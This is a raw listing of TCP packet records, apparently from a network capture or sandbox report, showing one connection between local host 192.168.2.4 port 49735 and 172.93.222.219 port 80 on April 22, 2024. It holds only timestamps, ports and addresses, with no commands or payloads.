                                                Apr 22, 2024 13:33:54.356803894 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.356873035 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.356920004 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.356975079 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.357043982 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.357120037 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.359095097 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.359143019 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.359174013 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.359220982 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.359272003 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.359327078 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.359373093 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.359424114 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.359550953 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.359596014 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.359627008 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.359682083 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.359728098 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.359766960 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.359909058 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.359947920 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.359951973 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.359997988 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.360095024 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.360130072 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.360193014 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.360239983 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.360328913 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.360375881 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.360399961 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.360464096 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.360511065 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.360554934 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.360599041 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.360644102 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.360738039 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.360784054 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.360814095 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.360855103 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.360927105 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.360972881 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.361051083 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.361093998 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.361146927 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.361248970 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.361279964 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.361326933 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.361391068 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.361443996 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.361484051 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.361531973 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.361610889 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.361650944 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.361735106 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.361778975 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.361824036 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.361955881 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.361998081 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.362099886 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.362145901 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.362148046 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.362205029 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.362265110 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.362318993 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.362363100 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.362445116 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.362473965 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.362518072 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.362607002 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.362643957 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.362660885 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.362706900 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.362776995 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.362827063 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.362921000 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.362963915 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.363008976 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.363044024 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.363136053 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.363173008 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.363267899 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.363315105 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.363414049 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.363466024 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.363467932 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.363545895 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.363549948 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.363589048 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.363678932 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.363718987 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.363787889 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.363826036 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.363924026 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.363984108 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.364006996 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.364047050 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.364119053 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.364180088 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.364223957 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.364273071 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.364351988 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.364407063 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.364435911 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.364518881 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.364564896 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.364602089 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.364645958 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.364696026 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.364780903 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.364828110 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.364855051 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.364907026 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.364975929 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.365031004 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.365106106 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.365156889 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.365227938 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.365272045 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.365292072 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.365345955 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.365396023 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.365464926 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.365546942 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.365586042 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.523250103 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.523305893 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.523319006 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.523358107 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.523432970 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.523478985 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.523546934 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.523596048 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.523641109 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.523705006 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.523750067 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.523792982 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.523855925 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.523900986 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.523945093 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.523988008 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.524080038 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.524123907 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.524190903 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.524235010 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.524288893 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.524329901 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.524389982 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.524440050 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.526309013 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.526351929 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.526356936 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.526388884 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.526468039 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.526513100 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.526556969 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.526617050 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.526652098 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.526698112 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.526757956 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.526808977 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.526899099 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.526947021 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.526993036 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.527036905 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.527103901 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.527159929 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.527184010 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.527230024 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.527312040 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.527354956 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.527439117 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.527489901 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.527555943 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.527601957 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.527631044 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.527683020 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.527775049 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.527831078 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.527915001 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.527966976 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.530388117 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.530435085 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.530495882 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.530559063 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.530586004 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.530631065 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.530728102 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.530766964 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.530796051 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.530841112 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.530946016 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.530998945 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.531021118 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.531035900 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.531131029 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.531181097 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.531224012 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.531295061 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.531325102 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.531368017 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.531471014 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.531521082 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.531565905 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.531666994 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.531723976 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.531768084 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.531886101 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.531936884 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.532004118 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.532093048 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.532113075 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.532212973 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.532215118 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.532255888 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.532299995 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.532354116 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.532437086 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.532531977 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.532587051 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.532650948 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.532764912 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.532779932 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.532809973 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.532857895 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.532902002 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.532994986 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.533049107 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.533086061 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.533132076 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.533196926 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.533298969 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.533305883 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.533338070 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.533413887 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.533466101 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.533531904 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.533623934 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.533670902 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.533713102 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.533746958 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.533797979 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.533843994 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.533961058 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.534007072 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.534060001 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.534106016 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.534234047 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.534281015 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.534312010 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.534384966 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.534435987 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.534570932 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.534624100 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.534627914 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.534681082 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.534728050 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.534792900 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.534852028 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.534893036 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.534955025 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.535006046 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.535049915 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.535094023 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.535161018 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.535200119 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.535249949 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.535289049 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.535375118 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.535423040 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.535489082 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.535593987 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.535617113 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.535631895 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.535713911 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.535763025 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.535811901 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.535933971 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.535942078 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.536030054 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.536097050 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.536151886 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.536201954 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.536286116 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.536361933 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.536375999 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.536487103 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.536504984 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.536519051 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.536578894 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.536637068 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.536681890 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.536756039 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.536808014 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.536870956 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.536916018 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.536971092 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.537045956 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.537101030 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.537131071 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.537209034 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.537260056 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.537358046 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.537416935 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.537450075 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.537503004 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.537575960 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.537626028 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.537708998 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.537755966 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.537786007 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.537897110 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.537940979 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.538008928 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.538038969 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.538083076 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.538125992 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.538181067 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.538242102 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.538291931 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.538321972 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.538409948 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.538446903 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.538543940 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.538570881 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.538644075 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.538669109 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.538686991 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.538777113 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.538819075 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.538865089 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.538907051 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.539000034 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.539052963 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.539077044 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.539125919 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.539197922 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.539241076 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.539366007 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.539416075 CEST4973580192.168.2.4172.93.222.219
